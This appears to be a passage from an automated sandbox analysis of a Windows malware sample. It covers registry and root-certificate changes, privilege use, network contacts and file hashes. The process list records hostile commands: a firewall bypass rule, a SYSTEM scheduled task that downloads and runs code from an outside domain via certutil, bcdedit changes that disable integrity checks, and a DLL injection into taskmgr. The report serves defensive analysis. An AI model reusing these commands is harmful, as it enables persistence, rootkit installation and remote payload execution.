| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-591 = "Malay Peninsula Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1412 = "Syria Standard Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-512 = "Central Asia Standard Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-434 = "Georgian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-581 = "North Asia East Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-364 = "Middle East Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-21 = "Cape Verde Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-471 = "Ekaterinburg Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-22 = "Cape Verde Standard Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-331 = "E. Europe Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Windows\rss\csrss.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Windows\rss\csrss.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\rss\csrss.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\app.exe
"C:\Users\Admin\AppData\Local\Temp\app.exe"
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20241108090848.log C:\Windows\Logs\CBS\CbsPersist_20241108090848.cab
C:\Users\Admin\AppData\Local\Temp\app.exe
"C:\Users\Admin\AppData\Local\Temp\app.exe"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe ""
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ninhaine.com | udp |
| US | 8.8.8.8:53 | 2makestorage.com | udp |
| US | 8.8.8.8:53 | nisdably.com | udp |
| US | 8.8.8.8:53 | a34aa2d5-2eb7-45f5-af08-417506d7b8de.ninhaine.com | udp |
| US | 8.8.8.8:53 | server8.ninhaine.com | udp |
| CZ | 46.8.8.100:443 | server8.ninhaine.com | tcp |
| CZ | 46.8.8.100:443 | server8.ninhaine.com | tcp |
| US | 8.8.8.8:53 | msdl.microsoft.com | udp |
| US | 204.79.197.219:443 | msdl.microsoft.com | tcp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard30.blob.core.windows.net | udp |
| US | 20.150.70.36:443 | vsblobprodscussu5shard30.blob.core.windows.net | tcp |
| US | 8.8.8.8:53 | ww82.ninhaine.com | udp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard20.blob.core.windows.net | udp |
| US | 20.150.38.228:443 | vsblobprodscussu5shard20.blob.core.windows.net | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| CZ | 46.8.8.100:443 | server8.ninhaine.com | tcp |
| GB | 2.19.117.18:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | spolaect.info | udp |
| CZ | 46.8.8.100:443 | server8.ninhaine.com | tcp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| CZ | 46.8.8.100:443 | server8.ninhaine.com | tcp |
Files
memory/2452-0-0x0000000003B30000-0x0000000003F6C000-memory.dmp
memory/2452-1-0x0000000003B30000-0x0000000003F6C000-memory.dmp
memory/2452-2-0x0000000003F70000-0x0000000004896000-memory.dmp
memory/2452-3-0x0000000000400000-0x0000000000D41000-memory.dmp
memory/2452-7-0x0000000003F70000-0x0000000004896000-memory.dmp
memory/2452-6-0x0000000003B30000-0x0000000003F6C000-memory.dmp
memory/2768-5-0x0000000003AE0000-0x0000000003F1C000-memory.dmp
memory/2452-8-0x0000000000400000-0x0000000000D41000-memory.dmp
memory/2452-4-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/2768-9-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/2768-10-0x0000000000400000-0x00000000021A3000-memory.dmp
\Windows\rss\csrss.exe
| MD5 | d3f680a40104a2bf44d1e55ab22cc283 |
| SHA1 | 3e44293bd666ee6842f27001e561442203479698 |
| SHA256 | a5d0a8eb93516f6979ce8da08a5750bf7f0f0fc98a969cd9e5b175dd29302a86 |
| SHA512 | 478c308a40b3da9697ef9925e3d8c375bdc9a51d17d401fdf947f1e9ec7b4b5b59d5aa6e5ab0857825f5dbcb398a1cfffe33f972b6841d2916329f2e2358510b |
memory/2808-20-0x00000000039F0000-0x0000000003E2C000-memory.dmp
memory/2768-21-0x0000000000400000-0x00000000021A3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
| MD5 | 13aaafe14eb60d6a718230e82c671d57 |
| SHA1 | e039dd924d12f264521b8e689426fb7ca95a0a7b |
| SHA256 | f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3 |
| SHA512 | ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3 |
\Users\Admin\AppData\Local\Temp\symsrv.dll
| MD5 | 5c399d34d8dc01741269ff1f1aca7554 |
| SHA1 | e0ceed500d3cef5558f3f55d33ba9c3a709e8f55 |
| SHA256 | e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f |
| SHA512 | 8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d |
memory/2264-34-0x0000000140000000-0x00000001405E8000-memory.dmp
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | 1afff8d5352aecef2ecd47ffa02d7f7d |
| SHA1 | 8b115b84efdb3a1b87f750d35822b2609e665bef |
